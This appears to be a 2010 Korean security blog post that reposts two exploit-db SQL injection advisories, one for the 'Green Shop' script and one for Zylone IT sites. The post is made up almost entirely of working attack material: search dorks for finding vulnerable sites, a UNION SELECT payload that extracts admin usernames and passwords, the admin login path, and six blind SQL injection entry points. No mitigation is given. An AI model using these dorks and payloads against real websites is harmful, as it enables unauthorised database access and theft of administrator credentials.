본문 바로가기
모의해킹 (WAPT)

SQL Injection Vulnerability

by ·´″°³о♡ 날으는물고기 2010. 7. 8.

SQL Injection Vulnerability

728x90
SQL Injection Vulnerabilities Green Shop
  
[x] Tybe: SQL Injection Vulnerabilities
[x] Vendor: egreen.ir
[x] Script Name: Green Shop
[x] author: Ashiyane Digital Security Team
[x] Thanks To N4H
[?] Submit By PrinceofHacking ^_^
[x] Mail : Prince[dot]H4ck@gmail[dot]com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
D0rk: "egreen.ir"
 
Exploit:
http://site.org/index.php?pid=[SQLi]
 
Ex:
http://site.org/index.php?pid=77/**/Union/**/SELECT/**/Group_concat(username,0x3a,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/**/from/**/admins/**/--
 
Login Page :
http://site.org/admin/login.php
 
Special Tnx : All Ashiyane Members


Zylone IT Multiple Blind SQL Injection Vulnerability

# Exploit Title: Zylone IT Multiple Blind SQL Injection Vulnerability
# Date: 2010-07-08
# Author: Callo
# Software Link: http://www.zylone.com/
# Version: Unknown
# Tested on: php
  
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Title: Zylone IT Multiple Blind SQL Injection Vulnerability               0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Date: 2010-07-07                                                          0
0                                                                              1
10101010101010101010101010101010101010101010101010101010101010101010101010101010
0                                                                              1
1 ~# Author: Callo                                                             0
0 ~# Home: www.gsk2.org                                                        1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Software Link: http://www.zylone.com/                                     1
1 ~# Version: Unknow
0 ~# Tested on: php                                                            1
1 ~# Dork: Powered by Zylone IT                                                0
0          Powered By: Zylone IT                                               1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Exploit: http://localhost/[PATH]/news_details.php?news_id=[BLIND SQLi]    1
1             http://localhost/[PATH]/news.php?cat_id=[BLIND SQLi]             0
0             http://localhost/[PATH]/news_details.php?sec_id=[BLIND SQLi]     1
1             http://localhost/[PATH]/home.php?page_id=[BLIND SQLi]            0
0             http://localhost/[PATH]/events.php?cat_id=[BLIND SQLi]           1
1             http://localhost/[PATH]/policy.php?sec_id=[BLIND SQLi]           0
0                                                                              1
01010101010101010101010101010101010101010101010101010101010101010101010101010101
1                                                                              0
0 ~# Greetz: Whivack                                                           1
1                                                                              0
01010101010101010101010101010101010101010101010101010101010101010101010101010101


출처 : exploit-db.com
728x90

댓글0